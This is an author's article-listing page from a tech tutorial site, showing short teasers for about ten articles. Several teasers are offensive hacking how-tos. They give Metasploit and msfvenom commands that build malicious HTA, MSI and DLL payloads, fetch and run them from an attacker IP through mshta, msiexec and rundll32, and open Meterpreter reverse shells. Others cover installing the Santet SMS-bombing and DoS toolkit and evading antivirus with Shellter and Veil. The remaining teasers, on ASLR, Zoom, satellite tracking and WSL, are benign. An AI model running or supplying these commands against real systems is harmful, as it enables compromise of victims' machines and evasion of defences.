Ajay yadav

Ajay yadav

38 Articles Published

Articles by Ajay yadav

Page 2 of 4

Hacking with HTA file (MSHTA.exe)

Ajay yadav
Ajay yadav
Updated on 23-Sep-2020 2K+ Views

The Windows OS utility responsible for running HTA( HTML Application) files that we can run with JavaScript or VBScript. You can interpret these files using the Microsoft MSHTA.exe tool.Metasploit contain the “HTA Web Server” module which generates malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell.Malicious HTA fileOpen metasploit in Kali linux and hit the following commands to generate a malicious HTA file as;use exploit/windows/misc/hta_serverset srvhost 192.168.1.109set lhost 192.168.1.109exploitNow run the malicious code on the target machine through mshta.exe on the victim’s machine to obtain meterpreter sessions.

Read More

Hacking with Santet

Ajay yadav
Ajay yadav
Updated on 23-Sep-2020 1K+ Views

This article articulates how to hack using Santet tool which has several different attacks built into one package. It allows you to create payload, Hijack Facebook Group, perform SMS bomber and SMS Spoof attack and finally Denial of Service attack. Follow the instruction below to learn how to install Santet and use it further.Turn on your Kali machine, open a terminal and type ingit clonehttps://github.com/Gameye98/santet-onlineNow change your current directory to santet using the cd command − cd santet-onlineNow give execute permission to the santet.py file by executing this command − chmod -x santet.py, now run python santet.py as following;If everything ...

Read More

Get the Reverse Shell with MSI package

Ajay yadav
Ajay yadav
Updated on 23-Sep-2020 2K+ Views

Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.Launch msiexec attack via msfvenomLet’s generate an MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows;msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msiAt the target end, when the victim execute the 1.msi file on the remote machine with the following utiliy;msiexec /q /i http://192.168.1.109/1.msiThe attacker get the reverse shell of the victim machine by starting multi/handler as the listener.use exploit/multi/handlerset pyaload windows/meterpreter/reverse_tcpset lhost 192.168.1.109exploit

Read More

Bypass Antivirus with Shelter

Ajay yadav
Ajay yadav
Updated on 23-Sep-2020 1K+ Views

Shellter is an active shellcode insertion tool. It effectively re-encodes payloads to bypass anti-virus software. Shellter embeds a 32-bit Windows application and the shellcode in such a way that it goes undetected by the AV software.InstallationYou can install Shellter directly on Kali by using the following command −apt-get install shellterapt-get install wine32How to BypassOpen shelter using wine app, select the operation mode as 'a'.choose an executable file and copy it to the Shellter folder. This is required to be done to bind Shellter with a .exe file. In our case, we have copied the putty.exe file to the Shellter folder ...

Read More

Rundll32.exe Attack

Ajay yadav
Ajay yadav
Updated on 23-Sep-2020 710 Views

Rundll32.exe is associated with Windows Operating System that allows you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.Launch Rundll32 Attack via SMBMetasploit contains the “SMB Delivery” module which generates malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads.Generate DLL payloaduse exploit/windows/smb/smb_deliverymsf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109(attacker IP)msf exploit(windows/smb/smb_delivery) > exploitNow, you execute this generated malicious dll file on the victim machine with the help of rundll32.exe, you will get the reverse connection at your machine.rundll32.exe \192.168.1.109\vabFG\test.dll, 0

Read More

Address Space Layout Randomization (ASLR)

Ajay yadav
Ajay yadav
Updated on 23-Sep-2020 423 Views

Memory corruption vulnerabilities have plagued software for decades, despite efforts by large companies like Apple, Google, and Microsoft to eradicate them. This article presents some basic facts about ASLR, focusing on the Windows implementation. In addition to covering what ASLR accomplishes to improve security posture, we aim to give defenders advice on how to improve the security of their software, and to give researchers more insight into how ASLR works and ideas for investigating its limitations.Memory corruption vulnerabilities occur when a program mistakenly writes attacker-controlled data outside of an intended memory region or outside intended memory’s scope. This may crash ...

Read More

How to Secure ZOOM application

Ajay yadav
Ajay yadav
Updated on 20-Apr-2020 242 Views

This article poses a common advisory and security measure note for the Zoom users to protect themself from presumptive hacking attempt, as this application is quite vulnerable to breach. Zoom is quite trending and its popularity mysteriously skyrocket in last 3 month in terms of downloads (20 CR) despite having other plethora of amazing video conferencing application. Zoom does not have the End-to-end encryption facility like whatsapp and WebEx and attackers can potentially gain control to the ZOOM without its user’s cognizance by mean of a secret tools called zWarDial.However, I am not going to discuss the usage of this ...

Read More

Bypass Anti-virus using Veil Framework

Ajay yadav
Ajay yadav
Updated on 20-Apr-2020 2K+ Views

This article is intended to demonstrate, how to bypass the anti-virus detection using the Veil framework, as it is a collection of tools designed for use during penetration testing. It currently consists of the following modules −Veil-Evasion − a tool to generate antivirus-evading payloads using a variety of techniques and languagesVeil-Catapult − a psexec-style payload delivery system that integrates Veil-EvasionVeil-PowerView − a powershell tool to gain network situational awareness on Windows domainsVeil-Pillage − a modular post-exploitation framework that integrates Veil-EvasionRequirementsTo install the Veil- Framework, you are supposed to configure the latest Python packages into your machine.How to InstallThe important point ...

Read More

Satellite Tracking

Ajay yadav
Ajay yadav
Updated on 13-Apr-2020 702 Views

This article showcases the real − time satellite tracking and orbit prediction program for both the Linux and desktop using gpredict software. We can run in real-time, simulated real-time (fast forward and backward), and manual time control with this tool.Core features of GpredictTracking of a large number of satellites moving across the globe.Display the tracking data in lists, maps, polar plots and any combination of these.We can predict upcoming passes with the base stationDetailed information both the real-time and non-real time modesDoppler tuning of radios via Hamlib rigctldAntenna rotator control via Hamlib rotctldPrerequisiteThe satellite tracking software gpredict requires the following ...

Read More

Run Linux Natively on Windows 10

Ajay yadav
Ajay yadav
Updated on 13-Apr-2020 520 Views

Microsoft has introduced the WSL Subsystem for Linux, which lets users run their favorite Linux distributions directly from Windows 10 without dual-booting or using a virtual machine.Limitations of Windows Subsystem for LinuxWhile this is a step in the right direction for Microsoft, it's not quite there yet in terms of full functionality. Specifically, WSL does not support AF_PACKET for security restrictions. This means that you won't be able to put a Wi-Fi adapter in promiscuous mode (or monitor mode), and tools that require raw sockets to function properly won't work, such as Nmap.Installation the Windows Subsystem for LinuxStep-1:To do so, ...

Read More
Showing 11–20 of 38 articles
Advertisements